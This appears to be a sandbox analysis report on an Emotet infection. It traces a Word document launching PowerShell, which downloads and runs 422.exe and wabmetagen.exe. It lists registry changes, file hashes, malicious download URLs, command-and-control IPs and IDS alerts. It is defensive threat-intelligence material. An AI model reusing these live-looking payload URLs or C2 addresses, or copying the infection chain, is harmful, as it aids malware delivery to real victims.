User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | — | powershell.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3840 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | 422.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3404 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 422.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3964 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Version: 3.0.69 |
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | u4$ |
Value: 75342400240B0000010000000000000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1312161822 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312161936 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312161937 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 240B000034CAED0567B2D40100000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | {6$ |
Value: 7B362400240B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | {6$ |
Value: 7B362400240B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8CD5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEBB6D82.jpg | — | |
MD5:— | SHA256:— | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M1ZAF3EQZN3D5ZVK6I6Z.temp | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:5404C1A1796637D7E27F522D4FF7C5CE | SHA256:F1EEDB376F46D5EAD38432F64067BB8C801AA0B364244DA62885FCFADC2E1877 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a0f9.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$1901_Untitled_1795.doc | pgc | |
MD5:3C9EE964C7413846FEC2B8C97B6E26A1 | SHA256:D0F25541627B4B82669C48FF14565DB5F4E8EFE8898BFE3A4EF8E0749A238295 | |||
3840 | 422.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:F0B9498D9283963AECC26AE5E294525F | SHA256:98CDFB8FC884D724311D0F53559ACA2EFDF2765C8B297302D3A80C07C336B067 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Local\Temp\422.exe | executable | |
MD5:F0B9498D9283963AECC26AE5E294525F | SHA256:98CDFB8FC884D724311D0F53559ACA2EFDF2765C8B297302D3A80C07C336B067 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3964 | wabmetagen.exe | GET | — | 200.43.114.10:8080 | http://200.43.114.10:8080/ | AR | — | — | malicious |
3964 | wabmetagen.exe | GET | — | 190.55.123.250:80 | http://190.55.123.250/ | AR | — | — | malicious |
— | — | GET | — | 201.103.81.129:80 | http://201.103.81.129/ | MX | — | — | malicious |
3528 | powershell.exe | GET | 200 | 176.120.24.163:80 | http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx/ | RU | executable | 539 Kb | malicious |
3528 | powershell.exe | GET | 301 | 176.120.24.163:80 | http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx | RU | html | 333 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | wabmetagen.exe | 200.43.114.10:8080 | — | Telecom Argentina S.A. | AR | malicious |
3528 | powershell.exe | 46.242.177.30:80 | agatawierzbicka.com | home.pl S.A. | PL | suspicious |
3528 | powershell.exe | 176.120.24.163:80 | remont-kvartir.rise-up.nsk.ru | NetPoint Ltd. | RU | malicious |
3964 | wabmetagen.exe | 190.55.123.250:80 | — | Telecentro S.A. | AR | malicious |
3528 | powershell.exe | 195.201.179.80:80 | docsdetector.xyz | Awanti Ltd. | RU | malicious |
— | — | 201.103.81.129:80 | — | Uninet S.A. de C.V. | MX | malicious |
3964 | wabmetagen.exe | 189.159.119.242:22 | — | Uninet S.A. de C.V. | MX | suspicious |
Domain | IP | Reputation |
---|---|---|
agatawierzbicka.com |
| suspicious |
docsdetector.xyz |
| malicious |
remont-kvartir.rise-up.nsk.ru |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3528 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3528 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3528 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3528 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3528 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3964 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3964 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3964 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3964 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |